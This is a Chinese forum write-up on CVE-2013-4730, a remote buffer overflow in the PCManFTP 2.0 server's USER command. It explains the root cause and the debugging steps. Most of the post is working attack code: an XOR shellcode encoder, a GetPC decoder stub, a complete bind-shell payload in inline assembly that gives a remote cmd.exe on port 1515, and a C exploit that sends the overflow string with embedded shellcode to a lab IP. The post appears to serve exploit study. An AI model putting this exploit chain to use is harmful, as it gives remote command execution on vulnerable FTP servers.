-
-
[原创]小白分析PCManFTP漏洞 CVE-2013-4730
-
2020-11-26 19:23 6573
-
软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2020-11-24 | 操作系统:Window 7 专业版(32位) 漏洞编号:CVE-2013-4730 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:远程 |
1.软件简介
PCMan's FTP Server是洪任谕先生所研发的一套FTP服务器软件。
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。
FTP协议常用指令 | 功能说明 |
USER <username> PASS <password> CWD <dir path> RETR <filename> RMD <directory> RNTO <new path> HELP <command> | 用户名 密码 改变服务器上的工作目录 在服务器上删除指定目录 从服务器上找回(复制)文件 对新路径重命名 返回指定命令信息 |
2.漏洞成因
PCMan's FTP Server 2.0版本中存在缓冲区溢出漏洞。远程攻击者可借助USER命令中的长字符串利用该漏洞执行任意代码。在recv函数上下断点持续跟踪,发现服务端在接收到登录请求之后,会将受到的信息进行字符串拼接,而在字符串拼接的地方,并未进行长度控制,因此导致缓冲区溢出,即使用sprintf 对于写入buffer的字符数是没有限制的,这就存在了buffer溢出的可能性。解决这个问题,可以考虑使用 snprintf函数,该函数可对写入字符数做出限制。
3.利用过程
3.1准备工作
1)自动生成有序数,并能确定异常点的偏移(可以使用windbg插件Mona2)
2)Mona2环境需要Python 2.7
3)Windbg(用来定位JMP ESP地址)
4)OllyDbg(为了后续测试)
5)Visual Studio2019写测试代码和ShellCode
3.2配置环境
1)虚拟机win7专业版sp1
2)安装WDK,它自带WinDBG
3)安装Python2.7.2
4)安装Visual C++ 2008运行库
5)安装WinDbg的Python插件Pykd
6)复制mona.py和windbglib.py到WinDbg同目录
7)运行WinDbg随便调试一个程序进行测试以上环境
.load pykd.pyd加载pykd
!py mona 测试Mona
.reload /f加载windbg符号
3.3软件测试
FTP需要符合标准:RFC959
1)建立Socket连接,连接目标FTP
2)连接FTP服务器的欢迎语
3)发送”USER XXX”到FTP
4)接受请求结果
5)详细代码在后文exploit(poc中4))
3.4手动Fuzz测试
构建长字符串进行测试,使用mona生成有序长字符串!Py mona pc 3000,替换掉”+++Haha+++”,再测试,发现测试代码在等待服务器信息处不能退出,虚拟机中的程序已经崩溃
观察windbg中的信息,得到异常信息并查找到异常处在字符串中的位置
得到偏移后,在系统中查找一个JMP ESP作为跳板
用当前指令(!py mona jmp r esp)得到的地址不能作为跳板,因为如果转成字符串, 会有00出现,使用指定模块查找方法
3.5 Shellcode组合逻辑
第一部分:”USER ”(注意有空格)
第二部分:无意义的字符串,长度为2001个字节
第三部分:JMP ESP
第四部分:解密代码+Payload,位于ESP指向的地址,与JMP ESP指令相差4个字节
Payload 在读取时被0x00字符截断了,对Payload 进行异或加密,并在开头加上解密代码的十六进制数
3.6 Payload(BindShell)
BindShell原理:将一个cmd控制台的标准输入输出句柄定向至一个网络端口,那么本地的cmd控制台不会接受本地的命令输入,同样本地也不会看到命令执行的回显,此时连接本地网络端口的远程程序获得了此cmd控制台的所有权限,可以像在本地一样直接控制被连接的机器
本文中首先发送shellcode给ftp,这时候创建socket,绑定的端口是21,payload中也会创建socket,它绑定的端口是1515,所以当发送shellcode之后,主机连接对方时cmd命令是 telnet加上ip再加上1515
4.POC
1)实现加密功能的代码
#include "stdio.h" #include "windows.h" bool AutoEnCoder( char* pData, int nSize ) { // 1. 尝试不同的KEY进行加密,直到加密后不出现 0x00; int nOutKey = 0x00; unsigned char* pBuffer = nullptr; bool bComplete = true; pBuffer = ( unsigned char* )new char[ nSize + 1 ]; for ( int key = 0; key <= 0xFF; key++) { nOutKey = key; bComplete = true; for ( int i = 0; i < nSize; i++ ) { pBuffer[ i ] = pData[ i ] ^ key; if ( 0x00 == pBuffer[i] || 0x0A == pBuffer[i] || 0x0D == pBuffer[i] || 0x20 == pBuffer[i]) { // 如果加密后的字节为0x00直接跳出循环,用下一个KEY进行加密 bComplete = false; break; } } if (bComplete) { // 如果到了这里依然都是不为0的结果,那么说明加密完成。跳出 break; } } if ( !bComplete ) { // 全部找完还未加密完成直接不做接下来的操作 return false; } // 保存KEY和加密后的文本 FILE* fpOutFile; if ( EINVAL == fopen_s(&fpOutFile,"Encode.txt","w+") ) { // 增加健壮 return false; } // 输出'Encode Key = 0xXX' fprintf( fpOutFile, "/* Encode Key = 0x%.2x */\n", nOutKey ); // 输出加密后的字符数组 fprintf( fpOutFile, "char ShellCode[] = \\\n" ); for (int i = 0; i < nSize; i++ ) { fprintf( fpOutFile, "\\x%.2X", pBuffer[ i ] ); if ((i+1)%16 == 0) { fprintf( fpOutFile, "\"\\\n" ); } } // 再输出一个 "; fprintf( fpOutFile, "\";" ); // 完成,关闭句柄,释放资源 fclose( fpOutFile ); delete[]pBuffer; return true; } char cShellCode[] = "被加密代码的opecode写这里哟"; int main() { AutoEnCoder(cShellCode,sizeof(cShellCode)); return 0; }
2)实现解密功能的代码
#include "stdio.h" #include "windows.h" int main() { _asm { xor eax, eax; // GetPC call tag_Get_PC - 1; tag_Get_PC: retn; pop eax; // Decode lea esi, [ eax + 0x1B ]; xor ecx, ecx; mov cx, 0x27b; tag_Decode: mov al, [ esi + ecx ]; xor al, 0x17; mov[ esi + ecx ], al; loop tag_Decode; xor[ esi + ecx ], 0x17; jmp esi; } return 0; }
3)Payload代码(bindshell)
#include<Windows.h> int main() { _asm { sub esp, 0x50; push ebp; mov ebp, esp; sub esp, 0x10; jmp tag_ShellCode; // 前置代码跳过数据区 // cmd.exe\0 25 _asm _emit(0x63) _asm _emit(0x6D) _asm _emit(0x64) _asm _emit(0x2E) _asm _emit(0x65) _asm _emit(0x78) _asm _emit(0x65) _asm _emit(0x00) // ws2_32.dll\0 1D _asm _emit(0x77) _asm _emit(0x73) _asm _emit(0x32) _asm _emit(0x5F) _asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64) _asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00) // kernel32.dll\0 12 _asm _emit(0x6B) _asm _emit(0x65) _asm _emit(0x72) _asm _emit(0x6E) _asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64) _asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00); tag_ShellCode: // 1. GetPC call tag_Next; tag_Next: pop ebx; // 这里就得到了shellcode的地址 mov[ebp - 0x04], ebx; // EBP - 4 CodeBase; // 2. 获取关键地址:kernel32.dll地址 mov esi, fs:[0x30]; // PEB addr mov esi, [esi + 0x0c]; // PEB_LDR_DATA mov esi, [esi + 0x1c]; // 双向链表 mov esi, [esi]; // 取出下一个结构体地址 mov edx, [esi + 0x08]; // 获取Kernel32.dll地址 //mov[ ebp - 0x08 ], edx; // EBP - 8 KernelBaseAddr // 3. 查找 LoadLibraryExA地址 push edx; // KernelBaseAddr push 0xc0d83287; // 提前计算好的LoadLibraryExA字符的简易HASH call fun_GetFunAddrByHash; // 通过比较HASH查找 关键函数 mov edi, eax; // 4. 加载Kernel32.dll增加兼容性 lea esi, [ebx - 0x12]; // "Kernel32.dll"字符串地址 push 0; // dwFlag = 0 push 0; // hFile = 0 push esi; // lpLibFileName = "Kernel32.dll" call edi; // LoadLibraryExA(); mov[ebp - 0x08], eax; // 5. 加载WS2_32.dll以方便后边的网络通信编程 lea esi, [ebx - 0x1D]; // "ws2_32.dll"字符串地址 push 0; // dwFlag = 0 push 0; // hFile = 0 push esi; // lpLibFileName = "ws2_32.dll" call edi; // LoadLibraryExA(); mov[ebp - 0x0c], eax; // 6. 执行PayLoad部分 push[ebp - 0x0c]; // ws2_32.dll 地址 push[ebp - 0x08]; // Kernel32.dll addr push[ebp - 0x04]; // CodeBase addr call fun_PayLoad; // 7. PayLoad 执行完毕结束程序,防止被调试分析 push[ebp - 0x08]; // KernelBase push 0x4fd18963; // ExitProcess hash值 call fun_GetFunAddrByHash; push 0; // ExitCode = 0; call eax; // ExitProcess(0); mov esp, ebp; pop ebp; fun_GetFunAddrByHash: push ebp; mov ebp, esp; sub esp, 0x0c; push edx; // 1. 获取EAT,ENT,EOT地址: mov ecx, [ebp + 0x0c]; // ecx,参数1是 IMAGEBASE mov eax, [ecx + 0x3c]; // edx + 3c 是DOS头指向NT头的偏移 mov eax, [eax + ecx + 0x78]; // eax + edx 是NT头的地址 再 + 0x78 是数据目录表[0]的偏移 mov edi, [eax + ecx + 0x1c]; // EAT RVA add edi, ecx; mov[ebp - 0x04], edi; // EAT 保存到局部变量1中 mov edi, [eax + ecx + 0x20]; // ENT add edi, ecx; mov[ebp - 0x08], edi; // ENT 保存到局部变量2中 mov edi, [eax + ecx + 0x24]; // EOT add edi, ecx; mov[ebp - 0x0c], edi; // EOT 保存到局部变量3中 mov edi, [eax + ecx + 0x18]; // 导出表中 名称数量 // 2. 循环比较ENT中的函数名 xor ecx, ecx; jmp tag_FirstCmp; tag_CmpFunNameLoop: inc ecx; tag_FirstCmp: mov esi, [ebp - 0x08]; // ENT addr mov esi, [esi + ecx * 4]; // ENT RVA 当下一次比较时,指针 + 4 mov edx, [ebp + 0x0c]; // KernelBase lea esi, [edx + esi]; // 获取到具体函数名的指针 push[ebp + 0x08]; // 参数2:要进行对比的摘要 push esi; // 函数名指针 call fun_Hash_CmpString; // ecx = "GetProcAddress"长度 cmp eax, 1; // 如果对比函数返回1则说明找到这个函数了 jne tag_CmpFunNameLoop; // 不相等继续进行比较 mov esi, [ebp - 0x0c]; // 取出EOT xor edi, edi; mov di, [esi + ecx * 2]; // di是序号,函数名在ENT表中的下标与序号表中的序号是对应的;要在EOT中找到这个ECX对应的地方 // *2 是每个序号为WORD型,占两个字节,要偏移ECX * 2个字节 才是需要的数据 // 这个数据 用于在EAT中作为下标查找对应的地址; mov edx, [ebp - 0x04]; // 取出 EAT mov esi, [edx + edi * 4]; // esi = 用序号在函数地址数组找到函数名对应函数地址 mov edx, [ebp + 0x0c]; // edx = param_1 IMAGE_BASE // 返回获取到的关键函数地址 lea eax, [edx + esi]; // getprocaddress pop edx; mov esp, ebp; pop ebp; retn 0x08; fun_Hash_CmpString: push ebp; mov ebp, esp; sub esp, 0x04; // 开辟局部变量并清零 mov dword ptr[ebp - 0x04], 0x00; push ebx; // 保存用到的寄存器 push ecx; push edx; mov esi, [ebp + 0x08]; // strFunName xor ecx, ecx; xor eax, eax; tag_HashLoop: mov al, [esi + ecx]; // 字符串的第ecx字符 test al, al; // 判断是否为0。 jz tag_HashEnd; // 为0结束循环 mov ebx, [ebp - 0x04]; // 得到hash1 shl ebx, 0x19; // hash1<< 25 mov edx, [ebp - 0x04]; // hash2>>7 shr edx, 0x07; or ebx, edx; // hash1 + hash2 add ebx, eax; // 添加下一个字符的ASCII mov[ebp - 0x04], ebx; inc ecx; // ecx++ jmp tag_HashLoop; tag_HashEnd: mov ebx, [ebp + 0x0c]; // 这里得到 函数名摘要 mov edx, [ebp - 0x04]; // 要进行对比的摘要 xor eax, eax; cmp ebx, edx; // 比较这两个摘要 jne tag_FunEnd; // 不相等就结束比较 mov eax, 1; // 相等返回1 tag_FunEnd: pop edx; pop ecx; pop ebx; mov esp, ebp; pop ebp; retn 0x08; fun_PayLoad: push ebp; mov ebp, esp; sub esp, 0x300; // 1. 初始化winsock服务 push[ebp + 0x10]; // kernelBase push 0x80b46a3d; // WSAStartup 摘要 call fun_GetFunAddrByHash; lea esi, [ebp - 0x300]; // WSADATA push esi; // LPWSAData = WSADATA push 0x0202; // wVersionRequested = 2.2 call eax; // WSAStartup() test eax, eax; // 函数返回结果 0 为执行成功 jnz tag_PayLoadEnd; // 2. 创建一个原始套接字 push[ebp + 0x10]; // kernelbase push 0xde78322d; // WSASocketA 摘要 call fun_GetFunAddrByHash; push 0; push 0; push 0; push 6; // protocol = IPPROTO_TCP push 1; // type = sock_STREAM push 2; // -af = AF_INET call eax; // WSASocketA() mov[ebp - 0x04], eax; // 得到的套接字给局部变量 // 3. 在任意地址上绑定一个端口1515; push[ebp + 0x10]; // kernelBase push 0xdda71064; // bind 摘要 call fun_GetFunAddrByHash; mov word ptr[ebp - 0x200], 0x02; // sockaddr_in.sin_family = AF_INET mov word ptr[ebp - 0x1fe], 0xeb05;// sockAddr_in.sin_port = 1515(0xEB05) htons(1515); mov dword ptr[ebp - 0x1fc], 0; // sockaddr_in.sin_addr = inaddr_any lea esi, [ebp - 0x200]; // esi = sockaddr_in push 0x14; // 结构体长度 push esi; // 结构体:SOCKADDR_IN push[ebp - 0x04]; // socket call eax; // bind(); test eax, eax; // 绑定成功返回0 jnz tag_PayLoadEnd; // 4. 监听端口的连接 push[ebp + 0x10]; push 0x4bd39f0c; call fun_GetFunAddrByHash; push 0x7fffffff; // backlong = SOMAXCONN push[ebp - 0x04]; // socket call eax; // listen() cmp eax, 0; //and eax, eax; // 成功返回0 jnz tag_PayLoadEnd; // 5. 接受连接 push[ebp + 0x10]; push 0x01971eb1; call fun_GetFunAddrByHash; push 0; // 参数3:addrlen = null push 0; // 参数2:addr = null push[ebp - 0x04]; // 参数1:socket call eax; // accept() mov[ebp - 0x04], eax; // 返回结果到局部变量 // 6. 创建一个cmd进程 push[ebp + 0x0c]; // kernel32.dll base push 0x6ba6bcc9; call fun_GetFunAddrByHash; mov edx, eax; // CreateProcess() 地址 lea edi, [ebp - 0x90]; // 清空STARTUPINFOA mov ecx, 0x11; // STARTUPINFOA mov eax, 0x00; // 从EBP - 0x90开始 cld; // 到ebp-0x48结束 rep stosd; mov dword ptr[ebp - 0x90], 0x00000044; // cb = 68 mov dword ptr[ebp - 0x64], 0x00000101; // dwFlag = STARTF_USESTDHANDLES mov word ptr[ebp - 0x60], 0x0000; // wShowWindow = SW_HIDE mov esi, [ebp - 0x04]; // socket mov dword ptr[ebp - 0x58], esi; // Input = socket mov dword ptr[ebp - 0x54], esi; // Output = socket mov dword ptr[ebp - 0x50], esi; // Error = socket lea esi, [ebp - 0x90]; // STARTUPINFOA lea edi, [ebp - 0x200]; // PROCESS_INFORMATION 结构体 mov ebx, [ebp + 0x08]; // CodeBase lea ebx, [ebx - 0x25]; // "cmd.exe\0" push edi; push esi; push 0; push 0; push 0; push 1; push 0; push 0; push ebx; push 0; call edx; // CreateProcessA() tag_PayLoadEnd: mov esp, ebp; pop ebp; retn 0x0c; } return 0; }
4)Exploit代码,其中字符串pCompand是shellcode的opecode
#include <WinSock2.h> #include <windows.h> #pragma comment(lib,"Ws2_32.lib") int main() { // 1. 初始化SOCKET WSADATA stWSA; WSAStartup(0x0202, &stWSA); // 2. 创建原始套接字 SOCKET stListen = INVALID_SOCKET; stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0); // 3. 在任意地址绑定一个端口21(INADDR_ANY) SOCKADDR_IN stService; stService.sin_addr.s_addr = inet_addr("192.168.161.132"); stService.sin_port = htons(21); stService.sin_family = AF_INET; connect(stListen, (SOCKADDR*)& stService, sizeof(stService)); // 4. 接受返回信息缓冲区 char szRecv[0x100] = { 0 }; // 5.登录请求 char pCompand[] = "\x55\x53\x45\x52\x20\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\xF7\xF7\x02\x76\x41\x41\x41\x41"\ "\x33\xC0" "\xE8\xFF\xFF\xFF\xFF"\ "\xC3"\ "\x58"\ "\x8D\x70\x1B" "\x33\xC9"\ "\x66\xB9\x79\x02" "\x8A\x04\x0E\x34\x17\x88\x04\x0E\xE2\xF6\x80\x34\x0E\x17\xFF\xE6" \ "\x94\xFB\x47\x42\x9C\xFB\x94\xFB\x07\xFC\x37\x74\x7A\x73\x39\x72"\ "\x6F\x72\x17\x60\x64\x25\x48\x24\x25\x39\x73\x7B\x7B\x17\x7C\x72"\ "\x65\x79\x72\x7B\x24\x25\x39\x73\x7B\x7B\x17\xFF\x17\x17\x17\x17"\ "\x4C\x9E\x4A\xEB\x73\x9C\x22\x27\x17\x17\x17\x9C\x61\x1B\x9C\x61"\ "\x0B\x9C\x21\x9C\x41\x1F\x45\x7F\x90\x25\xCF\xD7\xFF\x29\x17\x17"\ "\x17\x9C\xEF\x9A\x64\xF9\x7D\x17\x7D\x17\x41\xE8\xC0\x9E\x52\xEF"\ 